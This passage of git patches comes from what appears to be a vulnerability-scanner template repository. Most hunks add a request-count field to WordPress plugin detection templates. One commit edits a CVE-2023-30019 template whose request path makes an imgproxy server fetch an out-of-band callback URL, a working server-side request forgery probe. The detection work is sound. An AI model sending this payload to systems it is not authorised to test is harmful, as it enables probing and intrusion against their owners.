tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index b7ad16e281..48481fde3b 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 10fd071b0b..b34d196268 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 1d41b4ec2c..54dce49b42 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From d371883e2cf47e5e4241ebe5b4cd331be23dea96 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 1 Jul 2023 15:45:22 +0530 Subject: [PATCH 232/609] misc updates --- http/cves/2023/CVE-2023-30019.yaml | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) diff --git a/http/cves/2023/CVE-2023-30019.yaml b/http/cves/2023/CVE-2023-30019.yaml index 479e9b887a..e035b4169e 100644 --- a/http/cves/2023/CVE-2023-30019.yaml +++ b/http/cves/2023/CVE-2023-30019.yaml @@ -1,39 +1,38 @@ id: CVE-2023-30019 info: - name: imgproxy <= 3.14.0 - Server-side request forgery (SSRF) + name: Imgproxy <= 3.14.0 - Server-side request forgery (SSRF) author: DhiyaneshDK severity: medium description: | imgproxy <=3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter. reference: - https://breakandpray.com/cve-2023-30019-ssrf-in-imgproxy/ + - https://github.com/imgproxy/imgproxy classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 + cve-id: CVE-2023-30019 cwe-id: CWE-918 + epss-score: 0.00046 + cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* metadata: max-request: 1 - verified: "true" + verified: true shodan-query: "Server: imgproxy" tags: cve,cve2023,imgproxy,ssrf,oast http: - method: GET path: - - '{{BaseURL}}/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}' + - "{{BaseURL}}/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}" matchers-condition: and matchers: - type: word words: - - 'Invalid source image' - - - type: word - part: interactsh_protocol - words: - - "http" + - Invalid source image - type: status status: - - 422 + - 422 \ No newline at end of file From 45c579c325c149dcd50f3b03436f70963c65aeb3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 10:15:46 +0000 Subject: [PATCH 234/609] Auto Generated Templates Checksum [Sat Jul 1 10:15:46 UTC 2023] :robot: --- templates-checksum.txt | 404 ++++++++++++++++++++--------------------- 1 file changed, 202 insertions(+), 202 